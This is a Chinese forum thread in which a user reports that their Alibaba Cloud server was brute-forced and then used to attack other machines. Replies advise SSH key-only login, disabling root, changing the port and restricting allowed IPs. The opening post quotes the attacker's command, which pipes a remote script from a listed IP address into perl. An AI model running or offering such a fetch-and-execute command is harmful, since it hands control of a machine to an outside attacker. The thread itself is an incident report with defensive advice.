查看: 36|回复: 36

阿里云被人暴力破解了

[复制链接]

1

主题

0

回帖

3

积分

新手上路

积分
3
发表于 2026-7-14 11:46:41 | 显示全部楼层 |阅读模式
看了下最近登陆地是法国,那人用这个命令:bash -c echo -e "\033[0m";echo -ne " \033[93m[\033[91m 1491/15819 \033[93m] \033[93m[\033[97m Executing cmd to \033[92m123.56.152.41:22 \033[93m] \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl

下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了
回复

使用道具 举报

0

主题

6

回帖

12

积分

新手上路

积分
12
发表于 2026-7-14 11:59:45 | 显示全部楼层
太正常了,服务器天天被扫
所以只开 私钥登录
回复

使用道具 举报

0

主题

2

回帖

4

积分

新手上路

积分
4
发表于 2026-7-14 12:05:36 | 显示全部楼层
没有类似 cloudflare tunnel 的东西吗?我一般都不暴露 ssh 端口出来。
回复

使用道具 举报

0

主题

34

回帖

68

积分

注册会员

积分
68
发表于 2026-7-14 12:09:33 | 显示全部楼层
有点这样的经历挺好的,不然根本理解不了为什么要做那么对防护操作,也理解不了渗透往往只是几个简单的漏洞组合起来的严重后果
回复

使用道具 举报

6

主题

20

回帖

58

积分

注册会员

积分
58
发表于 2026-7-14 12:10:20 | 显示全部楼层
只是你自己的云服务器。。。我还以为是阿里云。。。
回复

使用道具 举报

6

主题

45

回帖

108

积分

注册会员

积分
108
发表于 2026-7-14 12:12:50 | 显示全部楼层
@webfamer 楼主 ssh 用的弱密码吗?我的阿里云为了方便也开了远程 ssh 登录,端口也没改,不过是强密码,很多年了,看到一直有攻击,一直都没事😄
回复

使用道具 举报

0

主题

7

回帖

14

积分

新手上路

积分
14
发表于 2026-7-14 13:03:46 | 显示全部楼层
这标题起的
回复

使用道具 举报

0

主题

25

回帖

50

积分

注册会员

积分
50
发表于 2026-7-14 13:09:23 | 显示全部楼层
这标题,云服务器第一件事就是
1. 禁止 root 登录
2. 禁止密码登录,使用 ssh 密钥登录
3. 修改默认 ssh 端口 22 到其他
回复

使用道具 举报

0

主题

7

回帖

14

积分

新手上路

积分
14
发表于 2026-7-14 13:27:46 | 显示全部楼层
你咋不说银河系被人暴力破解了
回复

使用道具 举报

0

主题

2

回帖

4

积分

新手上路

积分
4
发表于 2026-7-14 13:34:21 | 显示全部楼层
可以加强 ECS 安全组规则防护,限制远程连接服务器的 IP 地址,只允许自己的 IP 连接。
定期修改服务器密码,设置复杂的密码,建议设置用 ssh 密钥方式远程连接服务器。
这样基本就可以防护暴力破解了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖
返回顶部